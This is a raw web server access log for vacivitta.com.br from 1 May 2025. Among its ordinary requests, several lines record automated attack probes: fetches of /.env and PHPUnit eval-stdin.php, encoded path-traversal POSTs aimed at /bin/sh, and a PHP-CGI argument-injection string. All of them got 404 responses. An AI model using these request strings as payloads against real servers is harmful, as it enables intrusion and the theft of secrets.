154.81.156.54 - - [01/May/2025:16:33:41 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [01/May/2025:16:52:28 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
vacivitta.com.br:80
185.218.84.178 - - [01/May/2025:16:53:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [01/May/2025:17:00:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.241.208.113 - - [01/May/2025:17:11:43 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
vacivitta.com.br:80
185.241.208.113 - - [01/May/2025:17:11:43 -0300] "POST / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
vacivitta.com.br:80
185.241.208.113 - - [01/May/2025:17:11:46 -0300] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "python-requests/2.32.3"
vacivitta.com.br:80
165.232.143.88 - - [01/May/2025:17:13:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible)"
vacivitta.com.br:80
165.232.143.88 - - [01/May/2025:17:13:05 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "http://162.240.168.168/" "Mozilla/5.0 (compatible)"
vacivitta.com.br:80
40.124.176.81 - - [01/May/2025:17:14:10 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
89.168.108.39 - - [01/May/2025:17:19:00 -0300] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:17:19:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
89.168.108.39 - - [01/May/2025:17:19:33 -0300] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
89.168.108.39 - - [01/May/2025:17:19:36 -0300] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
89.168.108.39 - - [01/May/2025:17:19:37 -0300] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
89.168.108.39 - - [01/May/2025:17:19:38 -0300] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
89.168.108.39 - - [01/May/2025:17:19:39 -0300] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
89.168.108.39 - - [01/May/2025:17:19:40 -0300] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
89.168.108.39 - - [01/May/2025:17:19:41 -0300] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
